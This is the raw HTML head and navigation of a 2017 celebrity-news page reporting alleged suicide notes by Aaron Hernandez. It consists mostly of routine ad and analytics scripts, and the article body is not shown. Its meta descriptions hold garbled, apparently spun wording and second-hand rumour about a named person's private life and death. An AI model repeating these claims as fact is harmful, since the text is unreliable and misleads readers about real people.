<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#  fb: http://ogp.me/ns/fb# og: http://ogp.me/ns#"
	itemscope 
	itemtype="http://schema.org/WebSite" 
	prefix="og: http://ogp.me/ns# og: http://ogp.me/ns#" > <!--<![endif]-->
<head>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-5686136442868151",
    enable_page_level_ads: true
  });
</script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-5686136442868151",
    enable_page_level_ads: true
  });
</script>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-5686136442868151",
    enable_page_level_ads: true
  });
</script>
 <script type="text/javascript">
  window._taboola = window._taboola || [];
  _taboola.push({article:'auto'});
  !function (e, f, u) {
    e.async = 1;
    e.src = u;
    f.parentNode.insertBefore(e, f);
  }(document.createElement('script'),
  document.getElementsByTagName('script')[0],
  '//cdn.taboola.com/libtrc/thenewstrack/loader.js');
</script>
<meta name="poptm" content="36565ac295b4261e86b69518b921d062" />
<meta name="google-site-verification" content="WeZ_ZyrJQnWEyR0tdVcLOO47t_kJL3pKvZzEe_eZxzc" />
<meta name="google-site-verification" content="WeZ_ZyrJQnWEyR0tdVcLOO47t_kJL3pKvZzEe_eZxzc" />

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-68063521-1', 'auto');
  ga('send', 'pageview');

</script>
   <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,2186685,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?2186685&101" alt="counter stats" border="0"></a></noscript>
<!-- Histats.com  END  -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-43783327-1', 'auto');
  ga('send', 'pageview');

</script>
    
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="http://www.thenewstrack.com/xmlrpc.php" />
    
<meta property="fb:admins" content="https://www.facebook.com/pervaizvohra" />
<meta property="og:title" content="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report" />
<meta property="og:description" content="Aaron Hernandez supposedly composed three notes before he conferred suicide in his jail cell. Presently, a stunning new report asserts that one was routed to his gay sweetheart who is said to be under suicide look as more subtle elements of Aaron&#8217;s demise are uncovered. Aaron Hernandez supposedly co&hellip;" />
<meta property="og:url" content="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" />
<meta property="og:image" content="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png" />
<meta property="og:type" content="article" />
<meta property="og:site_name" content="The News Track" />
<meta property="article:tag" content="Aaron Hernandez" />
<meta property="article:tag" content="Aaron Hernandez dead" />
<meta property="article:tag" content="Celebrity News" />
<meta property="article:section" content="Celebrities" />
<meta property="article:published_time" content="2017-04-22T10:33:19+00:00" />
<meta property="article:publisher" content="https://www.facebook.com/TheNewsTrack/" />

<meta property="og:image" content="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png" /><meta name="author" content="Adela Brant">
<link rel="icon" type="image/png" href="http://www.thenewstrack.com/wp-content/uploads/2014/03/favicon-newstrack3.png">
<!-- Start The SEO Framework by Sybre Waaijer -->
<meta name="robots" content="noodp,noydir" />
<meta property="article:published_time" content="2017-04-22" />
<meta property="article:modified_time" content="2017-04-22" />
<link rel="canonical" href="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" />
<script type="application/ld+json">{"@context":"http:\/\/schema.org","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"item":{"@id":"http:\/\/www.thenewstrack.com\/","name":"The News Track"}},{"@type":"ListItem","position":2,"item":{"@id":"http:\/\/www.thenewstrack.com\/category\/celebrities\/","name":"Celebrities"}},{"@type":"ListItem","position":3,"item":{"@id":"http:\/\/www.thenewstrack.com\/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report\/","name":"Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death \u2014 Report","image":"http:\/\/www.thenewstrack.com\/wp-content\/uploads\/2017\/04\/Aaron-Hernandez.png"}}]}</script>
<script type="application/ld+json">{"@context":"http:\/\/schema.org","@type":"WebSite","name":"The News Track","url":"http:\/\/www.thenewstrack.com\/"}</script>
<!-- End The SEO Framework by Sybre Waaijer | 0.02399s -->


<!-- All in One SEO Pack 2.3.12.2.1 by Michael Torbert of Semper Fi Web Designob_start_detected [-1,-1] -->
<meta name="description"  content="Aaron Hernandez supposedly composed three notes before he conferred suicide in his jail cell. Presently, a stunning new report asserts that one was routed to" />

<meta name="keywords"  content="aaron hernandez,aaron hernandez dead,celebrity news,celebrities" />

<link rel="canonical" href="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" />
<meta property="og:title" content="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report - The News Track" />
<meta property="og:type" content="activity" />
<meta property="og:url" content="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" />
<meta property="og:image" content="http://www.thenewstrack.com/wp-content/plugins/all-in-one-seo-pack/images/default-user-image.png" />
<meta property="og:site_name" content="The News Track" />
<meta property="og:description" content="Aaron Hernandez supposedly composed three notes before he conferred suicide in his jail cell. Presently, a stunning new report asserts that one was routed to his gay sweetheart who is said to be under suicide look as more subtle elements of Aaron&#039;s demise are uncovered.  Aaron Hernandez supposedly composed three suicide letters that were found in his correctional facility cell after he hanged himself on Apr. 19. The notes were purportedly found the day after he killed himself at 27 years old at the Souza Baranowski Correctional Center. He was serving a lifelong incarceration without the likelihood of parole for the murder of Odin Lloyd, his life partner&#039;s sister&#039;s sweetheart. Another report asserted that the letters were routed to Aaron&#039;s life partner Shayanna Jenkins-Hernandez, his four-year old little girl Avielle, and his &quot;gay jailhouse significant other,&quot; as per a source from The Daily Mail. Past reports said that one letter was routed to general society and the others were for" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:title" content="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report - The News Track" />
<meta name="twitter:description" content="Aaron Hernandez supposedly composed three notes before he conferred suicide in his jail cell. Presently, a stunning new report asserts that one was routed to his gay sweetheart who is said to be under suicide look as more subtle elements of Aaron&#039;s demise are uncovered.  Aaron Hernandez supposedly composed three suicide letters that were found in his correctional facility cell after he hanged himself on Apr. 19. The notes were purportedly found the day after he killed himself at 27 years old at the Souza Baranowski Correctional Center. He was serving a lifelong incarceration without the likelihood of parole for the murder of Odin Lloyd, his life partner&#039;s sister&#039;s sweetheart. Another report asserted that the letters were routed to Aaron&#039;s life partner Shayanna Jenkins-Hernandez, his four-year old little girl Avielle, and his &quot;gay jailhouse significant other,&quot; as per a source from The Daily Mail. Past reports said that one letter was routed to general society and the others were for" />
<meta name="twitter:image" content="http://www.thenewstrack.com/wp-content/plugins/all-in-one-seo-pack/images/default-user-image.png" />
<meta itemprop="image" content="http://www.thenewstrack.com/wp-content/plugins/all-in-one-seo-pack/images/default-user-image.png" />
<!-- /all in one seo pack -->

<!-- This site is optimized with the Yoast SEO plugin v4.6 - https://yoast.com/wordpress/plugins/seo/ -->
<title>Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report - The News Track</title>
<meta name="description" content="Aaron Hernandez supposedly composed three notes before he conferred suicide in his jail cell. Presently, a stunning new report asserts that one was routed"/>
<meta name="robots" content="noodp"/>
<link rel="canonical" href="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report - The News Track" />
<meta property="og:description" content="Aaron Hernandez supposedly composed three notes before he conferred suicide in his jail cell. Presently, a stunning new report asserts that one was routed" />
<meta property="og:url" content="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" />
<meta property="og:site_name" content="The News Track" />
<meta property="article:tag" content="Aaron Hernandez" />
<meta property="article:tag" content="Aaron Hernandez dead" />
<meta property="article:tag" content="Celebrity News" />
<meta property="article:section" content="Celebrities" />
<meta property="article:published_time" content="2017-04-22T10:33:19+05:00" />
<meta property="og:image" content="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png" />
<meta property="og:image:width" content="528" />
<meta property="og:image:height" content="585" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="Aaron Hernandez supposedly composed three notes before he conferred suicide in his jail cell. Presently, a stunning new report asserts that one was routed" />
<meta name="twitter:title" content="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report - The News Track" />
<meta name="twitter:image" content="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez.png" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="The News Track &raquo; Feed" href="http://www.thenewstrack.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="The News Track &raquo; Comments Feed" href="http://www.thenewstrack.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="The News Track &raquo; Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report Comments Feed" href="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.thenewstrack.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.6.5"}};
			!function(a,b,c){function d(a){var c,d,e,f,g,h=b.createElement("canvas"),i=h.getContext&&h.getContext("2d"),j=String.fromCharCode;if(!i||!i.fillText)return!1;switch(i.textBaseline="top",i.font="600 32px Arial",a){case"flag":return i.fillText(j(55356,56806,55356,56826),0,0),!(h.toDataURL().length<3e3)&&(i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,65039,8205,55356,57096),0,0),c=h.toDataURL(),i.clearRect(0,0,h.width,h.height),i.fillText(j(55356,57331,55356,57096),0,0),d=h.toDataURL(),c!==d);case"diversity":return i.fillText(j(55356,57221),0,0),e=i.getImageData(16,16,1,1).data,f=e[0]+","+e[1]+","+e[2]+","+e[3],i.fillText(j(55356,57221,55356,57343),0,0),e=i.getImageData(16,16,1,1).data,g=e[0]+","+e[1]+","+e[2]+","+e[3],f!==g;case"simple":return i.fillText(j(55357,56835),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode8":return i.fillText(j(55356,57135),0,0),0!==i.getImageData(16,16,1,1).data[0];case"unicode9":return i.fillText(j(55358,56631),0,0),0!==i.getImageData(16,16,1,1).data[0]}return!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i;for(i=Array("simple","flag","unicode8","diversity","unicode9"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='superzoomgallerystylesheet-css'  href='http://www.thenewstrack.com/wp-content/plugins/super-zoom-gallery/szg-style.css?ver=4.6.5' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://www.thenewstrack.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.7' type='text/css' media='all' />
<link rel='stylesheet' id='fancybox-style-css'  href='http://www.thenewstrack.com/wp-content/plugins/light/css/jquery.fancybox.css?ver=4.6.5' type='text/css' media='all' />
<link rel='stylesheet' id='essb-cct-style-css'  href='http://www.thenewstrack.com/wp-content/plugins/easy-social-share-buttons3/lib/modules/click-to-tweet/assets/css/styles.css?ver=3.2.4' type='text/css' media='all' />
<link rel='stylesheet' id='easy-social-share-buttons-css'  href='http://www.thenewstrack.com/wp-content/plugins/easy-social-share-buttons3/assets/css/copy-retina/easy-social-share-buttons.css?ver=3.2.4' type='text/css' media='all' />
<link rel='stylesheet' id='easy-social-share-buttons-sidebar-css'  href='http://www.thenewstrack.com/wp-content/plugins/easy-social-share-buttons3/assets/css/essb-sidebar.css?ver=3.2.4' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_open_sans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C400%2C600%2C700&#038;ver=4.6.5' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_roboto-css'  href='http://fonts.googleapis.com/css?family=Roboto%3A500%2C400italic%2C700%2C900%2C500italic%2C400%2C300&#038;ver=4.6.5' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='http://www.thenewstrack.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.12.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://www.thenewstrack.com/wp-content/themes/Newspaper/style.css?ver=7.2' type='text/css' media='all' />
<script type='text/javascript' src='http://www.thenewstrack.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://www.thenewstrack.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<link rel='https://api.w.org/' href='http://www.thenewstrack.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.thenewstrack.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.thenewstrack.com/wp-includes/wlwmanifest.xml" /> 
<link rel="alternate" type="application/json+oembed" href="http://www.thenewstrack.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://www.thenewstrack.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fwww.thenewstrack.com%2Faaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report%2F&#038;format=xml" />
<style type="text/css">.essb_links_list li.essb_totalcount_item .essb_t_l_big .essb_t_nb:after, .essb_links_list li.essb_totalcount_item .essb_t_r_big .essb_t_nb:after { color: #777777;content: "SHARES";display: block;font-size: 11px;font-weight: normal;text-align: center;text-transform: uppercase;margin-top: -5px; } .essb_links_list li.essb_totalcount_item .essb_t_l_big, .essb_links_list li.essb_totalcount_item .essb_t_r_big { text-align: center; } .essb_displayed_sidebar .essb_links_list li.essb_totalcount_item .essb_t_l_big .essb_t_nb:after, .essb_displayed_sidebar .essb_links_list li.essb_totalcount_item .essb_t_r_big .essb_t_nb:after { margin-top: 0px; } .essb_displayed_sidebar_right .essb_links_list li.essb_totalcount_item .essb_t_l_big .essb_t_nb:after, .essb_displayed_sidebar_right .essb_links_list li.essb_totalcount_item .essb_t_r_big .essb_t_nb:after { margin-top: 0px; } .essb_totalcount_item_before, .essb_totalcount_item_after { display: block !important; } .essb_totalcount_item_before .essb_totalcount, .essb_totalcount_item_after .essb_totalcount { border: 0px !important; } .essb_counter_insidebeforename { margin-right: 5px; font-weight: bold; } .essb_width_columns_1 li { width: 100%; } .essb_width_columns_1 li a { width: 92%; } .essb_width_columns_2 li { width: 49%; } .essb_width_columns_2 li a { width: 86%; } .essb_width_columns_3 li { width: 32%; } .essb_width_columns_3 li a { width: 80%; } .essb_width_columns_4 li { width: 24%; } .essb_width_columns_4 li a { width: 70%; } .essb_width_columns_5 li { width: 19.5%; } .essb_width_columns_5 li a { width: 60%; } .essb_links li.essb_totalcount_item_before, .essb_width_columns_1 li.essb_totalcount_item_after { width: 100%; text-align: left; } .essb_network_align_center a { text-align: center; } .essb_network_align_right .essb_network_name { float: right;}</style>
<script type="text/javascript">var essb_settings = {"ajax_url":"http:\/\/www.thenewstrack.com\/wp-admin\/admin-ajax.php","essb3_nonce":"2ba080eed3","essb3_plugin_url":"http:\/\/www.thenewstrack.com\/wp-content\/plugins\/easy-social-share-buttons3","essb3_facebook_total":true,"essb3_admin_ajax":true,"essb3_internal_counter":true,"essb3_stats":true,"essb3_ga":true,"essb3_ga_mode":"simple","essb3_counter_button_min":0,"essb3_counter_total_min":0,"blog_url":"http:\/\/www.thenewstrack.com\/","ajax_type":"light","essb3_postfloat_stay":false,"essb3_no_counter_mailprint":true,"essb3_single_ajax":true,"twitter_counter":"self"};</script><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://www.thenewstrack.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="http://www.thenewstrack.com/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]-->
<!-- JS generated by theme -->

<script>
    
    

	    var tdBlocksArray = []; //here we store all the items for the current page

	    //td_block class - each ajax block uses a object of this class for requests
	    function tdBlock() {
		    this.id = '';
		    this.block_type = 1; //block type id (1-234 etc)
		    this.atts = '';
		    this.td_column_number = '';
		    this.td_current_page = 1; //
		    this.post_count = 0; //from wp
		    this.found_posts = 0; //from wp
		    this.max_num_pages = 0; //from wp
		    this.td_filter_value = ''; //current live filter value
		    this.is_ajax_running = false;
		    this.td_user_action = ''; // load more or infinite loader (used by the animation)
		    this.header_color = '';
		    this.ajax_pagination_infinite_stop = ''; //show load more at page x
	    }


        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .post img";
var td_ajax_url="http:\/\/www.thenewstrack.com\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=7.2";
var td_get_template_directory_uri="http:\/\/www.thenewstrack.com\/wp-content\/themes\/Newspaper";
var tds_snap_menu="smart_snap_always";
var tds_logo_on_sticky="show_header_logo";
var tds_header_style="";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#4db2ec";
var tds_smart_sidebar="enabled";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>


<!-- Header style compiled by theme -->

<style>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</style>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-43783327-1', 'auto');
  ga('send', 'pageview');

</script>
 <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,2186685,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?2186685&101" alt="counters" border="0"></a></noscript>
<!-- Histats.com  END  -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-68063521-1', 'auto');
  ga('send', 'pageview');

</script>
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-68063521-1', 'auto');
  ga('send', 'pageview');

</script>
<!-- BEGIN GADWP v4.9.6.2 Classic Tracking - https://deconf.com/google-analytics-dashboard-wordpress/ -->
<script type="text/javascript">
  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-43783327-1']);
  _gaq.push(['_trackPageview'], ['_gat._anonymizeIp']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'stats.g.doubleclick.net/dc.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();
</script>
<!-- END GADWP Classic Tracking -->

<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript></head>

<body class="single single-post postid-147097 single-format-gallery aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report white-menu wpb-js-composer js-comp-ver-4.12.1 vc_responsive td-animation-stack-type0 td-full-layout" itemscope="itemscope" itemtype="http://schema.org/WebPage">

        <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>
    
    <div class="td-menu-background"></div>
<div id="td-mobile-nav">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://thenewstrackofficial1.blogspot.com/" title="Blogger">
                <i class="td-icon-font td-icon-blogger"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://digg.com/u/thenewstrack" title="Digg">
                <i class="td-icon-font td-icon-digg"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.facebook.com/thenewstrack" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.flickr.com/people/thenewstrackcom/" title="Flickr">
                <i class="td-icon-font td-icon-flickr"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://plus.google.com/+thenewstrack" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.instagram.com/thenewstrack/" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://pk.linkedin.com/in/sheikh-pervaiz-vohra-4b1a8438" title="Linkedin">
                <i class="td-icon-font td-icon-linkedin"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="mailto:pervaizvohra466@gmail.com" title="Mail">
                <i class="td-icon-font td-icon-mail-1"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://myspace.com/thenewstrack" title="Myspace">
                <i class="td-icon-font td-icon-myspace"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="webstrackinc@gmail.com" title="Paypal">
                <i class="td-icon-font td-icon-paypal"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.pinterest.com/thenewstrack/" title="Pinterest">
                <i class="td-icon-font td-icon-pinterest"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra" title="Reddit">
                <i class="td-icon-font td-icon-reddit"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra466@gmail.com" title="RSS">
                <i class="td-icon-font td-icon-rss"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="pervaizvohra" title="Skype">
                <i class="td-icon-font td-icon-skype"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://soundcloud.com/sheikh-pervaiz-vohra" title="Soundcloud">
                <i class="td-icon-font td-icon-soundcloud"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.stumbleupon.com/submit" title="StumbleUpon">
                <i class="td-icon-font td-icon-stumbleupon"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://www.tumblr.com/login?redirect_to=%2Fblog%2Fthenewstrackofficial" title="Tumblr">
                <i class="td-icon-font td-icon-tumblr"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="https://twitter.com/thenewstrack" title="Twitter">
